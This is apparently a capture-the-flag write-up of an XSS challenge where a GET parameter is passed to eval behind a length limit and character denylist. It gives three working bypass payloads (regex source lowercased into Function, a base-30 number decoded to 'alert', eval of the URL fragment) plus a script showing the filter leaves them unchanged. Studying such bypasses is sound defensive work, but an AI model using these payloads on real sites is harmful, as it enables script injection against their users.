The GET parameter mafia is passed to eval, but the page does a couple of things to it before sending it over:
- Truncates it to length 50.
- Replaces each of the characters `'"+-!\[] with an underscore.
- Replaces the string alert with underscores.
To bypass this, we can simply take the string from a regex literal's source, lowercase it and feed it to Function.
Function(/ALERT(1337)/.source.toLowerCase())()
Or
eval(8680439..toString(30))(1337)
Or even better,
eval(location.hash.slice(1))
and then add #alert(1337) to the URL to make it work.
(Thanks to @terjanq)
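To see why a denylist on literal text does not constrain what eval ends up running, the filter can be rebuilt from the three rules above and run over the strings in this write-up. This is an added example, not the challenge's own code; the function names, the rule order, the case-sensitive match on alert and the single underscore per match are assumptions.

```javascript
// Added example: the filter rebuilt from the three rules listed above.
// Assumptions: rule order, case-sensitive "alert", one "_" per match.
function mafiaFilter(input) {
  return input
    .slice(0, 50)                         // truncate to 50 characters
    .replace(/[`'"+\-!\\\[\]]/g, "_")     // blocked punctuation -> "_"
    .replace(/alert/g, "_");              // literal "alert" -> "_"
}

// True when the filter leaves the string exactly as it was submitted.
function passesUnchanged(input) {
  return mafiaFilter(input) === input;
}

// The three strings from the write-up, with the direct call as a control.
const samples = [
  "alert(1337)",
  "Function(/ALERT(1337)/.source.toLowerCase())()",
  "eval(8680439..toString(30))(1337)",
  "eval(location.hash.slice(1))",
];

// What the first two strings rebuild at run time, computed without eval.
function rebuiltFromRegex() {
  return /ALERT(1337)/.source.toLowerCase();
}
function rebuiltFromBase30() {
  return (8680439).toString(30);
}

// One row per sample: what was sent, what the filter returned, and
// whether the two are identical.
function report() {
  return samples.map((s) => ({
    input: s,
    filtered: mafiaFilter(s),
    unchanged: passesUnchanged(s),
  }));
}

console.table(report());
console.log(rebuiltFromRegex(), rebuiltFromBase30());
```

Only the direct call is altered; the other three contain neither a blocked character nor the literal word, because the name is produced at run time or read from the URL fragment, which the filter never sees. Any fix has to remove the eval of request data rather than extend the denylist.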